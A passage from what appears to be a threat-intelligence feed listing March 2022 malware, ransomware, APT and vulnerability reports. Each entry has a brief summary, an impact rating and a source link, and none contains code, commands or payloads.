Source: https://cert.gov.ua/article/37815 https://socprime.com/blog/vermin-uac-0020-hacking-collective-hits-ukrainian-government-and-military-with-spectr-malware/
2022-03-23
Clipper malware disguised as AvD Crypto Stealer
LOW
Intel Source:
Cyble
Intel Name:
Clipper malware disguised as AvD Crypto Stealer
Date of Scan:
2022-03-23
Impact:
LOW
Summary:
Researchers at Cyble have discovered new malware dubbed 'AvD Crypto Stealer', but it does not function as a crypto stealer. Instead, it is a disguised variant of well-known clipper malware with the capability to read and edit any text copied by the victim.
Source: https://blog.cyble.com/2022/03/22/hunters-become-the-hunted/
2022-03-23
DoubleZero Destructive Malware targets Ukrainian firms
MEDIUM
Intel Source:
CERT-UA
Intel Name:
DoubleZero Destructive Malware targets Ukrainian firms
Date of Scan:
2022-03-23
Impact:
MEDIUM
Summary:
On March 17, CERT-UA found a destructive malware dubbed DoubleZero targeting Ukrainian firms. The malware erases files and destroys certain registry branches on the infected machine.
Source: https://cert.gov.ua/article/38088 https://socprime.com/blog/doublezero-destructive-malware-used-in-cyber-attacks-at-ukrainian-companies-cert-ua-alert/
2022-03-23
UAC-0026 targets Ukraine by HeaderTIP malware
MEDIUM
Intel Source:
CERT-UA
Intel Name:
UAC-0026 targets Ukraine by HeaderTIP malware
Date of Scan:
2022-03-23
Impact:
MEDIUM
Summary:
CERT-UA identified yet another malware, dubbed HeaderTip, which is leveraged to drop additional DLL files onto the infected host and has been targeting the infrastructure of Ukrainian state bodies and organizations across the country.
Source: https://cert.gov.ua/article/38097
2022-03-22
APT35 Automates Initial Access Using ProxyShell
MEDIUM
Intel Source:
DFIR Report
Intel Name:
APT35 Automates Initial Access Using ProxyShell
Date of Scan:
2022-03-22
Impact:
MEDIUM
Summary:
Researchers at The DFIR Report observed an intrusion attributed to APT35 exploiting ProxyShell vulnerabilities, followed by further post-exploitation activity that included web shells, credential dumping and specialized payloads.
Source: https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/
2022-03-22
Malware disguised as a Windows Help File
LOW
Intel Source:
ASEC
Intel Name:
Malware disguised as a Windows Help File
Date of Scan:
2022-03-22
Impact:
LOW
Summary:
The ASEC team has discovered malware disguised as a Windows Help File (*.chm) targeting Korean users. A CHM file is a compiled HTML Help file executed by the Microsoft HTML Help executable. When the CHM file is executed, it downloads additional malicious files.
Source: https://asec.ahnlab.com/en/32800/
2022-03-22
UAC-0035/InvisiMole targeting Ukrainian government
LOW
Intel Source:
CERT-UA
Intel Name:
UAC-0035/InvisiMole targeting Ukrainian government
Date of Scan:
2022-03-22
Impact:
LOW
Summary:
CERT-UA identified cyberattacks launched by the UAC-0035/InvisiMole threat group targeting Ukrainian government organisations using phishing campaigns. InvisiMole is likely a subgroup connected to the Russia-sponsored Gamaredon group.
Source: https://cert.gov.ua/article/37829
2022-03-22
Serpent Backdoor Targets French government firms
MEDIUM
Intel Source:
Proofpoint
Intel Name:
Serpent Backdoor Targets French government firms
Date of Scan:
2022-03-22
Impact:
MEDIUM
Summary:
Proofpoint researchers identified a targeted attack leveraging the open-source package installer Chocolatey to deliver a backdoor dubbed Serpent. The targets have been French firms in construction and real estate.
Source: https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain
2022-03-22
SurTr Ransomware recent activity
LOW
Intel Source:
Arete
Intel Name:
SurTr Ransomware recent activity
Date of Scan:
2022-03-22
Impact:
LOW
Summary:
Researchers from Arete investigated a security incident involving Surtr ransomware, which made a registry key change on the infected host to pay tribute to the REvil group.
Source: https://areteir.com/surtr-ransomware-pays-tribute-to-revil/
2022-03-22
DarkHotel APT New Campaign
LOW
Intel Source:
Trellix
Intel Name:
DarkHotel APT New Campaign
Date of Scan:
2022-03-22
Impact:
LOW
Summary:
Trellix researchers discovered a first-stage malicious campaign that has been targeting luxury hotels in Macao, China for the last five months; the attack has been attributed to the South Korean APT group DarkHotel.
Source: https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/suspected-darkhotel-apt-activity-update.html
2022-03-22
BitRAT distributed via webhards
MEDIUM
Intel Source:
ASEC
Intel Name:
BitRAT distributed via webhards
Date of Scan:
2022-03-22
Impact:
MEDIUM
Summary:
The ASEC team has analysed malware being distributed via webhards and identified it as BitRAT. The attacker disguised the malware as a Windows 10 license verification tool and, to lure users, named the installer 'New Quick Install Windows License Verification' One-click.
Source: https://asec.ahnlab.com/en/32781/
2022-03-22
Serpent Backdoor_Seeder_Queries_21/03/22
MEDIUM
Intel Source:
STR
Intel Name:
Serpent Backdoor_Seeder_Queries_21/03/22
Date of Scan:
2022-03-22
Impact:
MEDIUM
Summary:
This research is part of Securonix Threat Labs - Threat Research Team
Source: STR Repository
2022-03-21
CAKETAP Rootkit deployed by UNC2891
MEDIUM
Intel Source:
Mandiant
Intel Name:
CAKETAP Rootkit deployed by UNC2891
Date of Scan:
2022-03-21
Impact:
MEDIUM
Summary:
Security researchers from Mandiant came across a new Unix rootkit called CAKETAP that was used to steal ATM banking data. This rootkit was leveraged by UNC2891.
Source: https://www.mandiant.com/resources/unc2891-overview
2022-03-21
CONTI & EMOTET Infrastructure
LOW
Intel Source:
Dragos
Intel Name:
CONTI & EMOTET Infrastructure
Date of Scan:
2022-03-21
Impact:
LOW
Summary:
Researchers at Dragos have observed consistent network communication between the Emotet ransomware group and automotive manufacturers across North America and Japan; the activity is suspected to be controlled by the Conti ransomware group.
Source: https://www.dragos.com/blog/industry-news/suspected-conti-ransomware-activity-in-the-auto-manufacturing-sector/
2022-03-21
LokiLocker RaaS Targets Windows Systems
MEDIUM
Intel Source:
Blackberry
Intel Name:
LokiLocker RaaS Targets Windows Systems
Date of Scan:
2022-03-21
Impact:
MEDIUM
Summary:
A new ransomware-as-a-service dubbed LokiLocker has been identified by BlackBerry researchers. It targets English-speaking victims on Windows. The threat was first seen in the wild in mid-August 2021. LokiLocker encrypts victims’ files on local drives and network shares with a standard combination of AES for file encryption and RSA for key protection.
Source: https://blogs.blackberry.com/en/2022/03/lokilocker-ransomware
2022-03-21
DirtyMoe malware
LOW
Intel Source:
Avast
Intel Name:
DirtyMoe malware
Date of Scan:
2022-03-21
Impact:
LOW
Summary:
Researchers from Avast warned of the rapid growth of the DirtyMoe botnet, which grew from 10,000 infected systems in 2020 to more than 100,000 in the first half of 2021. Experts describe DirtyMoe as a complex malware designed as a modular system. The Windows botnet has been active since late 2017; it was mainly used to mine cryptocurrency, but it was also involved in DDoS attacks in 2018.
Source: https://decoded.avast.io/martinchlumecky/dirtymoe-5/
2022-03-21
BlackCat and BlackMatter ransomware connection
MEDIUM
Intel Source:
Cisco Talos
Intel Name:
BlackCat and BlackMatter ransomware connection
Date of Scan:
2022-03-21
Impact:
MEDIUM
Summary:
Cisco Talos researchers analysed the relationship between BlackCat ransomware and BlackMatter ransomware. They have concluded with moderate confidence that the same affiliate is behind both ransomware operations, as the same C2 infrastructure was used for certain attacks.
Source: https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html
2022-03-21
EXOTIC LILY/BazarLoader_TTP_Seeder_Queries_18/03/22
HIGH
Intel Source:
STR
Intel Name:
EXOTIC LILY/BazarLoader_TTP_Seeder_Queries_18/03/22
Date of Scan:
2022-03-21
Impact:
HIGH
Summary:
This research is part of Securonix Threat Labs - Threat Research Team
Source: STR Repository
2022-03-21
Cyclops Blink malware targets Asus Router
HIGH
Intel Source:
Trend Micro
Intel Name:
Cyclops Blink malware targets Asus Router
Date of Scan:
2022-03-21
Impact:
HIGH
Summary:
Researchers from Trend Micro have analyzed the technical capabilities of the Cyclops Blink malware variant that has been targeting ASUS routers, and provide an extensive list of more than 150 current and historical command-and-control (C2) servers of the Cyclops Blink botnet.
Source: https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html
2022-03-21
Cobalt Strike-an effective emulator
LOW
Intel Source:
Palo Alto
Intel Name:
Cobalt Strike-an effective emulator
Date of Scan:
2022-03-21
Impact:
LOW
Summary:
Cobalt Strike is a tool that emulates command-and-control communications; it is widely used in real-world attacks and can also be used to evade traditional firewall defenses. Cobalt Strike users control Beacon’s HTTP indicators through a profile and can select either the default profile or a customizable Malleable C2 profile.
Source: https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/
2022-03-21
GhostWriter New Espionage Campaign Update
MEDIUM
Intel Source:
QI-ANXIN Threat Intelligence Center
Intel Name:
GhostWriter New Espionage Campaign Update
Date of Scan:
2022-03-21
Impact:
MEDIUM
Summary:
CERT-UA found and analysed a malicious zip file containing a Microsoft Compiled HTML Help file named dovidka.chm. The malicious file, which displays the logos of the Ukrainian President’s office and secret services alongside advice on dealing with the bombing, was designed to spread malware for espionage purposes against targets located in Ukraine.
Source: https://ti.qianxin.com/blog/articles/Analysis-of-attack-activities-of-suspected-aptorganization-unc1151-against-ukraine-and-other-countries/
2022-03-21
Conti Gang working with IAB
MEDIUM
Intel Source:
Google
Intel Name:
Conti Gang working with IAB
Date of Scan:
2022-03-21
Impact:
MEDIUM
Summary:
The Google TAG team has uncovered the operations of a threat actor dubbed 'EXOTIC LILY', an initial access broker linked to the Conti and Diavol ransomware operations. EXOTIC LILY was first spotted exploiting a zero-day vulnerability in Microsoft MSHTML (CVE-2021-40444). Further investigation determined that EXOTIC LILY is an initial access broker that uses large-scale phishing campaigns to breach targeted corporate networks.
Source: https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/
2022-03-18
Qakbot infection with Cobalt Strike and VNC
MEDIUM
Intel Source:
ISC.SANS
Intel Name:
Qakbot infection with Cobalt Strike and VNC
Date of Scan:
2022-03-18
Impact:
MEDIUM
Summary:
Researchers at SANS have dissected
Source: https://isc.sans.edu/forums/diary/Qakbot+infection+with+Cobalt+Strike+and+VNC+activity/28448/
2022-03-17
WIZARD SPIDER massive phishing campaign
MEDIUM
Intel Source:
Prevailion
Intel Name:
WIZARD SPIDER massive phishing campaign
Date of Scan:
2022-03-17
Impact:
MEDIUM
Summary:
Earlier this year, researchers at Prevailion identified a massive phishing campaign focused on collecting the credentials of Naver users. Naver is a popular South Korean online platform, comparable to Google, that offers a variety of services (e.g. email, news and search, among many others). Researchers found overlaps with infrastructure historically linked to WIZARD SPIDER, a Russia-based threat actor focused on initial access and ransomware operations.
Source: https://www.prevailion.com/what-wicked-webs-we-unweave/
2022-03-17
Gh0stCringe RAT targets MS-SQL and MySQL servers
MEDIUM
Intel Source:
ASEC
Intel Name:
Gh0stCringe RAT targets MS-SQL and MySQL servers
Date of Scan:
2022-03-17
Impact:
MEDIUM
Summary:
The ASEC team has analysed and monitored malware being distributed to vulnerable MySQL and MSSQL servers. The ASEC team named the malware Gh0stCringe, also known as CirenegRAT.
Source: https://asec.ahnlab.com/en/32572/
2022-03-16
CaddyWiper TTP_Seeder_Queries_15/03/222
HIGH
Intel Source:
STR
Intel Name:
CaddyWiper TTP_Seeder_Queries_15/03/222
Date of Scan:
2022-03-16
Impact:
HIGH
Summary:
This research is part of Securonix Threat Labs - Threat Research Team
Source: STR Repository
2022-03-16
B1txor20 Botnet exploits Log4j vulnerability
MEDIUM
Intel Source:
netlab360
Intel Name:
B1txor20 Botnet exploits Log4j vulnerability
Date of Scan:
2022-03-16
Impact:
MEDIUM
Summary:
Researchers at Qihoo 360's Netlab captured an ELF file on their honeypot system that was first observed propagating through the Log4j vulnerability on February 9, 2022. After closely analysing the file, they named it B1txor20 based on its propagation using the file name 'b1t', its use of the XOR encryption algorithm, and the RC4 algorithm key length of 20 bytes.
Source: https://blog.netlab.360.com/b1txor20-use-of-dns-tunneling_en/
2022-03-16
Pandora Ransomware
MEDIUM
Intel Source:
Cyble
Intel Name:
Pandora Ransomware
Date of Scan:
2022-03-16
Impact:
MEDIUM
Summary:
Cyble Research Labs has analysed a sample of Pandora ransomware. After analysing the sample, Cyble believes that Pandora ransomware is a rebrand of ROOK ransomware, as they observed similar behaviour in the past. The Pandora ransomware gang is suspected of leveraging the double extortion method.
Source: https://blog.cyble.com/2022/03/15/deep-dive-analysis-pandora-ransomware/
2022-03-16
CaddyWiper Malware
HIGH
Intel Source:
ESET
Intel Name:
CaddyWiper Malware
Date of Scan:
2022-03-16
Impact:
HIGH
Summary:
ESET researchers have identified a third wiper malware impacting Ukraine, dubbed CaddyWiper. This wiper has a relatively small compiled size of just 9 KB compared with previous wipers. This is a developing threat; currently only one hash is available.
Source: https://twitter.com/ESETresearch/status/1503436420886712321 https://securityintelligence.com/posts/caddywiper-malware-targeting-ukrainian-organizations/ https://blog.talosintelligence.com/2022/03/threat-advisory-caddywiper.html
2022-03-16
Russian Threat Actors exploits PrintNightMare Vulnerability
HIGH
Intel Source:
CISA
Intel Name:
Russian Threat Actors exploits PrintNightMare Vulnerability
Date of Scan:
2022-03-16
Impact:
HIGH
Summary:
In a joint advisory, the FBI and CISA warn organizations that Russian state-sponsored threat actors have gained network access through exploitation of default MFA protocols and a known vulnerability. The advisory also provides TTPs, IOCs and recommendations to protect against Russian state-sponsored malicious cyber activity.
Source: https://www.cisa.gov/uscert/ncas/alerts/aa22-074a
2022-03-16
EnemyBot - Linux based Botnet
HIGH
Intel Source:
Securonix
Intel Name:
EnemyBot - Linux based Botnet
Date of Scan:
2022-03-16
Impact:
HIGH
Summary:
Securonix Threat Labs has identified a Linux-based botnet dubbed EnemyBot. STL correlates EnemyBot with the LolFMe botnet, which contains similar strings such as “watudoinglookingatdis”. The EnemyBot malware also has the ability to steal data via HTTP POST; in their analysis, STL identified the malware sending the data back to the original IP address.
Source: https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/
2022-03-15
GrimPlant and GraphSteel used to attack Ukraine
MEDIUM
Intel Source:
CERT-UA
Intel Name:
GrimPlant and GraphSteel used to attack Ukraine
Date of Scan:
2022-03-15
Impact:
MEDIUM
Summary:
CERT-UA identified cyberattacks launched by the UAC-0056 threat group targeting state authorities of Ukraine, using phishing emails with instructions on improving information security that deliver an executable leading to a Cobalt Strike beacon.
Source: https://cert.gov.ua/article/37704 https://socprime.com/blog/cobalt-strike-beacon-grimplant-and-graphsteel-malware-massively-spread-by-uac-0056-threat-actors-in-targeted-phishing-emails-cert-ua-alert/
2022-03-15
Dirty Pipe vulnerability in Linux kernel
HIGH
Intel Source:
SecureList
Intel Name:
Dirty Pipe vulnerability in Linux kernel
Date of Scan:
2022-03-15
Impact:
HIGH
Summary:
Security researcher Max Kellermann discovered a high-severity vulnerability in the Linux kernel that can be used for local privilege escalation. It affects Linux kernels from 5.8 up to, but not including, 5.16.11, 5.15.25 and 5.10.102.
Source: https://securelist.com/cve-2022-0847-aka-dirty-pipe-vulnerability-in-linux-kernel/106088/
2022-03-15
NIGHT SPIDER Zloader Campaign
LOW
Intel Source:
CrowdStrike
Intel Name:
NIGHT SPIDER Zloader Campaign
Date of Scan:
2022-03-15
Impact:
LOW
Summary:
Researchers from CrowdStrike tracked an ongoing, widespread intrusion campaign leveraging bundled .msi installers to trick victims into downloading malicious payloads alongside legitimate software. This was used to execute NIGHT SPIDER’s Zloader trojan.
Source: https://www.crowdstrike.com/blog/falcon-overwatch-uncovers-ongoing-night-spider-zloader-campaign/
2022-03-15
North KoreanTTP/Babyshark Campaign_Seeder_Queries_15/03/22
HIGH
Intel Source:
STR
Intel Name:
North KoreanTTP/Babyshark Campaign_Seeder_Queries_15/03/22
Date of Scan:
2022-03-15
Impact:
HIGH
Summary:
This research is part of Securonix Threat Labs - Threat Research Team
Source: STR Repository
2022-03-15
Decoding DanaBot malware
LOW
Intel Source:
Security Soup
Intel Name:
Decoding DanaBot malware
Date of Scan:
2022-03-15
Impact:
LOW
Summary:
A researcher at Security Soup wrote about a VBS-based DanaBot downloader that has added an obfuscation scheme and a few other TTPs to its arsenal.
Source: https://security-soup.net/decoding-a-danabot-downloader/
2022-03-14
CryptBot Infostealer disguised as Cracked Software
LOW
Intel Source:
Blackberry
Intel Name:
CryptBot Infostealer disguised as Cracked Software
Date of Scan:
2022-03-14
Impact:
LOW
Summary:
Researchers from BlackBerry came across a new and improved version of the malicious infostealer CryptBot, which has been released via compromised pirate sites that appear to offer “cracked” versions of popular software and video games.
Source: https://blogs.blackberry.com/en/2022/03/threat-thursday-cryptbot-infostealer
2022-03-14
Russian Threat Actors using Google Ad Delivery Network
MEDIUM
Intel Source:
NovaSOC
Intel Name:
Russian Threat Actors using Google Ad Delivery Network
Date of Scan:
2022-03-14
Impact:
MEDIUM
Summary:
Researchers from NovaSOC caught Russian actors utilizing the Google ad delivery network to establish browser connections. Russian IP addresses have been using the Google ad delivery network as a mechanism to initiate client network connections.
Source: https://innovatecybersecurity.com/security-threat-advisory/novasoc-catches-russian-actors-utilizing-google-ad-delivery-network-to-establish-browser-connections/
2022-03-14
Infostealer Distributed via YouTube
LOW
Intel Source:
ASEC
Intel Name:
Infostealer Distributed via YouTube
Date of Scan:
2022-03-14
Impact:
LOW
Summary:
ASEC researchers have discovered an infostealer being distributed via YouTube. The threat actor disguised the malware as a game hack and uploaded a video to YouTube with a download link for the malware.
Source: https://asec.ahnlab.com/en/32499/
2022-03-14
Sockbot in GoLand
MEDIUM
Intel Source:
Security Joes
Intel Name:
Sockbot in GoLand
Date of Scan:
2022-03-14
Impact:
MEDIUM
Summary:
Security Joes incident response team responded to malicious activity in one of their clients' network infrastructure. During the investigation it was discovered that the threat actors used two customized GoLang-compiled Windows executables “lsassDumper” and “Sockbot” to perform the attack.
Source: https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf
2022-03-14
Brazilian trojan targets Portuguese users
LOW
Intel Source:
seguranca-informatica
Intel Name:
Brazilian trojan targets Portuguese users
Date of Scan:
2022-03-14
Impact:
LOW
Summary:
A new variant of a Brazilian trojan has targeted users in Portugal; there seems to be no difference in sophistication compared with other well-known trojans such as Maxtrilha, URSA and Javali. The trojan has been disseminated via phishing templates impersonating tax services in Portugal.
Source: https://seguranca-informatica.pt/brazilian-trojan-impacting-portuguese-users-and-using-the-same-capabilities-seen-in-other-latin-american-threats/#.Yi8lzRBBxHb
2022-03-14
TunnelVision exploits VMWare Horizon Servers
MEDIUM
Intel Source:
esentire
Intel Name:
TunnelVision exploits VMWare Horizon Servers
Date of Scan:
2022-03-14
Impact:
MEDIUM
Summary:
Researchers from eSentire found suspicious account creation and credential harvesting attempts on a customer’s endpoint, which were traced back to a VMware Horizon server. The attack was linked with high confidence to TunnelVision, an Iranian-aligned threat actor.
Source: https://www.esentire.com/blog/exploitation-of-vmware-horizon-servers-by-tunnelvision-threat-actor
2022-03-14
Remcos RAT distribution campaign take advantage of Ukraine Invasion
MEDIUM
Intel Source:
Cisco Talos
Intel Name:
Remcos RAT distribution campaign take advantage of Ukraine Invasion
Date of Scan:
2022-03-14
Impact:
MEDIUM
Summary:
Cisco Talos researchers have observed threat actors using email lures themed around the Russia-Ukraine conflict, fundraising and humanitarian support. These emails are related to scam activity and deliver Remcos RAT.
Source: https://blog.talosintelligence.com/2022/03/ukraine-invasion-scams-malware.html
2022-03-14
Disguised malware exploit Ukrainian sympathizers- Liberator tool analysis
MEDIUM
Intel Source:
Cisco Talos
Intel Name:
Disguised malware exploit Ukrainian sympathizers- Liberator tool analysis
Date of Scan:
2022-03-14
Impact:
MEDIUM
Summary:
Researchers analysed the malware/tool called 'Liberator' from the disBalancer group. Furthermore, the post has been updated with two new IoCs.
Source: https://blog.talosintelligence.com/2022/03/threat-advisory-cybercriminals.htmll
2022-03-14
Kwampirs Malware Linked to Shamoon APT
MEDIUM
+
Intel Source:
Cylera
Intel Name:
Kwampirs Malware Linked to Shamoon APT
Date of Scan:
2022-03-14
Impact:
MEDIUM
Summary:
Cylera Labs assess with medium to high confidence that Shamoon and Kwampirs are the same group or close collaborators, sharing updates, techniques and code over the course of multiple years. The evolution of Kwampirs and its connections with Shamoon 1 and 2 are also well documented in the recent report by Cylera.
Source: https://resources.cylera.com/hubfs/Cylera%20Labs/Cylera%20Labs%20Kwampirs%20Shamoon%20Technical%20Report.pdf
2022-03-14
Formbook/XLoader targets Ukraine Government Officials
MEDIUM
+
Intel Source:
Netskope
Intel Name:
Formbook/XLoader targets Ukraine Government Officials
Date of Scan:
2022-03-14
Impact:
MEDIUM
Summary:
Netskope Threat Labs has analysed a phishing email targeting high-ranking government officials in Ukraine. The email appears to be part of a new spam campaign that contains an infected spreadsheet. The email also contains a .NET executable responsible for loading Formbook malware in a multi-stage chain.
Source: https://www.netskope.com/blog/new-formbook-campaign-delivered-through-phishing-emails https://github.com/netskopeoss/NetskopeThreatLabsIOCs/tree/main/Formbook/IOCs
2022-03-11
Online Contact forms delivering BazarLoader
MEDIUM
+
Intel Source:
Abnormal
Intel Name:
Online Contact forms delivering BazarLoader
Date of Scan:
2022-03-11
Impact:
MEDIUM
Summary:
Cybercriminals are always looking for new ways to target users. Researchers at Abnormal Security have identified attacks targeting users through an online contact form. They also observed that these attacks lead to the delivery of BazarLoader malware.
Source: https://abnormalsecurity.com/blog/bazarloader-contact-form
2022-03-11
Disguised malware exploits Ukrainian sympathizers
MEDIUM
+
Intel Source:
Cisco Talos
Intel Name:
Disguised malware exploits Ukrainian sympathizers
Date of Scan:
2022-03-11
Impact:
MEDIUM
Summary:
Threat actors are attempting to exploit Ukrainian sympathizers by offering malware as cyber tools to target Russian entities. Cisco Talos analysed one such instance where a threat actor was offering a DDoS tool on Telegram to target Russian websites. They downloaded the file and found it to be an infostealer.
Source: https://blog.talosintelligence.com/2022/03/threat-advisory-cybercriminals.html
2022-03-11
LazyScripter APT H-Worm campaign
MEDIUM
+
Intel Source:
Lab52
Intel Name:
LazyScripter APT H-Worm campaign
Date of Scan:
2022-03-11
Impact:
MEDIUM
Summary:
Researchers at Lab52 have tracked the activity of the LazyScripter APT and discovered new malware and new infrastructure elements in the LazyScripter arsenal. On further analysis of the LazyScripter malware, they found the use of a popular open-source online script obfuscation tool, which would inject its own downloader for njRAT.
Source: https://lab52.io/blog/very-very-lazy-lazyscripters-scripts-double-compromise-in-a-single-obfuscation/
2022-03-11
FormBook malware targets Ukrainians
MEDIUM
+
Intel Source:
Malwarebytes
Intel Name:
FormBook malware targets Ukrainians
Date of Scan:
2022-03-11
Impact:
MEDIUM
Summary:
Malwarebytes researchers recently discovered a malicious spam campaign dropping the Formbook stealer and specifically targeting Ukrainians. The email lures being sent are written in Ukrainian.
Source: https://blog.malwarebytes.com/threat-intelligence/2022/03/formbook-spam-campaign-targets-citizens-of-ukraine%ef%b8%8f/
2022-03-11
MuddyWater subgroup leveraging maldocs and RATs
MEDIUM
+
Intel Source:
Cisco Talos
Intel Name:
MuddyWater subgroup leveraging maldocs and RATs
Date of Scan:
2022-03-11
Impact:
MEDIUM
Summary:
Cisco Talos believes with high confidence that there are sub-groups operating under the MuddyWater umbrella targeting Turkey and Arabian Peninsula countries with maldocs and Windows Script File-based RATs. These sub-groups are highly motivated to conduct espionage and intellectual property theft and to implant malware and ransomware in targeted networks.
Source: https://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html
2022-03-11
Email interjection by Qakbot
MEDIUM
+
Intel Source:
Sophos
Intel Name:
Email interjection by Qakbot
Date of Scan:
2022-03-11
Impact:
MEDIUM
Summary:
Sophos Labs have discovered a new Qakbot botnet technique in which the botnet spreads itself by inserting malicious replies into the middle of existing email conversations. These interjections take the form of reply-all messages that include a short sentence and a link to download a zip file containing a malicious Office document.
Source: https://news.sophos.com/en-us/2022/03/10/qakbot-injects-itself-into-the-middle-of-your-conversations/
2022-03-10
Raccoon Stealer leverages Telegram
LOW
+
Intel Source:
Avast
Intel Name:
Raccoon Stealer leverages Telegram
Date of Scan:
2022-03-10
Impact:
LOW
Summary:
Researchers from Avast recently noted that Raccoon Stealer, a password-stealing malware, uses Telegram infrastructure to store and update its actual C&C addresses. Raccoon Stealer is distributed via the downloaders Buer Loader and GCleaner.
Source: https://decoded.avast.io/vladimirmartyanov/raccoon-stealer-trash-panda-abuses-telegram/
2022-03-10
Conti Ransomware Indicator of Compromise
HIGH
+
Intel Source:
FBI FLASH
Intel Name:
Conti Ransomware Indicator of Compromise
Date of Scan:
2022-03-10
Impact:
HIGH
Summary:
A joint advisory has been released by the FBI, NSA and CISA detailing updated indicators of compromise for Conti ransomware and its TTPs. The ransomware has been very active and its attack chains have included TrickBot and Cobalt Strike.
Source: https://www.cisa.gov/uscert/sites/default/files/publications/AA21-265A-Conti_Ransomware_TLP_WHITE.pdf
2022-03-10
Prometheus Ransomware Decrypted
LOW
+
Intel Source:
Avast
Intel Name:
Prometheus Ransomware Decrypted
Date of Scan:
2022-03-10
Impact:
LOW
Summary:
Avast researchers have recently released a decryptor for the Prometheus ransomware. Prometheus is a ransomware strain written in C# that inherited a lot of code from an older strain called Thanos.
Source: https://decoded.avast.io/threatresearch/decrypted-prometheus-ransomware/
2022-03-10
Emotet Resurgence
HIGH
+
Intel Source:
Lumen
Intel Name:
Emotet Resurgence
Date of Scan:
2022-03-10
Impact:
HIGH
Summary:
The infamous 'Emotet' malware, which returned in November 2021 after a 10-month gap, is once again showing signs of steady growth. Researchers at Lumen Black Lotus Labs have determined a strong resurgence of Emotet, with 130,000 unique bots spread across 179 countries since its return.
Source: https://blog.lumen.com/emotet-redux/
2022-03-09
Agent Tesla RAT campaign
HIGH
+
Intel Source:
Fortinet
Intel Name:
Agent Tesla RAT campaign
Date of Scan:
2022-03-09
Impact:
HIGH
Summary:
FortiGuard Labs analysed a phishing email impersonating a Ukraine-based materials and chemical manufacturing company sharing a purchase order. The phishing email carries a PPT attachment that starts a multi-stage effort to deploy the Agent Tesla RAT.
Source: https://www.fortinet.com/blog/threat-research/fake-purchase-order-used-to-deliver-agent-tesla
2022-03-09
GhostWriter New Espionage Campaign
MEDIUM
+
Intel Source:
CERT-UA
Intel Name:
GhostWriter New Espionage Campaign
Date of Scan:
2022-03-09
Impact:
MEDIUM
Summary:
CERT-UA found and analysed a malicious zip file containing a Microsoft Compiled HTML Help file named dovidka.chm. The malicious file was designed to spread malware for espionage purposes against targets located in Ukraine; it displays the logos of the Ukrainian President's office and secret services, with content offering advice on dealing with the bombing.
Source: https://cert.gov.ua/article/37626 https://cluster25.io/2022/03/08/ghostwriter-unc1151-adopts-microbackdoor-variants-in-cyber-operations-against-targets-in-ukraine/
2022-03-09
Nokoyawa Ransomware linked to Hive
MEDIUM
+
Intel Source:
Trend Micro
Intel Name:
Nokoyawa Ransomware linked to Hive
Date of Scan:
2022-03-09
Impact:
MEDIUM
Summary:
Trend Micro researchers came across a new ransomware with similarities to Hive ransomware, from the attack chain and the tools used to the order in which the various steps are executed. Most targets of the ransomware are located in South America.
Source: https://www.trendmicro.com/en_us/research/22/c/nokoyawa-ransomware-possibly-related-to-hive-.html
2022-03-09
RURansom Wiper Targets Russia
LOW
+
Intel Source:
Trend Micro
Intel Name:
RURansom Wiper Targets Russia
Date of Scan:
2022-03-09
Impact:
LOW
Summary:
Trend Micro researchers recently analyzed a sample released by MalwareHunterTeam which, according to them, is a wiper disguised as ransomware and was targeting Russia. The malware is written in .NET and spreads as a worm.
Source: https://www.trendmicro.com/en_us/research/22/c/new-ruransom-wiper-targets-russia.html
2022-03-09
APT41 targeting US Government
HIGH
+
Intel Source:
Mandiant
Intel Name:
APT41 targeting US Government
Date of Scan:
2022-03-09
Impact:
HIGH
Summary:
Researchers at Mandiant state that they became aware of a campaign in May 2021 when they were called in to investigate an attack on a US government network. Analysis revealed that the attack had likely been carried out by the Chinese nation-state group APT41. Researchers have confirmed that the hackers compromised the networks of at least six U.S. state government organizations between May 2021 and February 2022.
Source: https://www.mandiant.com/resources/apt41-us-state-governments
2022-03-09
APT41_TTP_Seeder_Queries_070322
HIGH
+
Intel Source:
STR
Intel Name:
APT41_TTP_Seeder_Queries_070322
Date of Scan:
2022-03-09
Impact:
HIGH
Summary:
This research is part of Securonix Threat Labs - Threat Research Team
Source: STR Repository
2022-03-09
UNC1151_TTP_Seeder_Queries_070322
HIGH
+
Intel Source:
STR
Intel Name:
UNC1151_TTP_Seeder_Queries_070322
Date of Scan:
2022-03-09
Impact:
HIGH
Summary:
This research is part of Securonix Threat Labs - Threat Research Team
Source: STR Repository
2022-03-08
TA416 targets European Government
HIGH
+
Intel Source:
Proofpoint
Intel Name:
TA416 targets European Government
Date of Scan:
2022-03-08
Impact:
HIGH
Summary:
Researchers at Proofpoint have discovered the threat group TA416 targeting European diplomatic entities, including individuals involved in refugee and migrant services. TA416 is assessed to be aligned with the Chinese state and exploits web vulnerabilities to profile its targets. Researchers identified that the campaign has escalated since tensions rose between Russia, Ukraine and NATO members in Europe.
Source: https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european
2022-03-08
RagnarLocker Ransomware IoCs
MEDIUM
+
Intel Source:
FBI FLASH
Intel Name:
RagnarLocker Ransomware IoCs
Date of Scan:
2022-03-08
Impact:
MEDIUM
Summary:
The Federal Bureau of Investigation (FBI) published a new FLASH report that provides additional IoCs associated with RagnarLocker ransomware. The FBI has identified at least 52 entities across 10 critical infrastructure sectors affected by RagnarLocker ransomware.
Source: https://www.ic3.gov/Media/News/2022/220307.pdf
2022-03-08
Emotet recent campaign using MS Excel
HIGH
+
Intel Source:
Fortinet
Intel Name:
Emotet recent campaign using MS Excel
Date of Scan:
2022-03-08
Impact:
HIGH
Summary:
Fortinet researchers have conducted deep research on 500 Excel files involved in delivering the Emotet Trojan. Researchers analysed the Excel file leveraged to spread Emotet, the anti-analysis techniques used, persistence on the victim's device, communication with C2 servers, and how modules are delivered, loaded and executed on the target system.
Source: https://www.fortinet.com/blog/threat-research/ms-office-files-involved-in-emotet-trojan-campaign-pt-one
2022-03-08
Webhards distributing njRAT
LOW
+
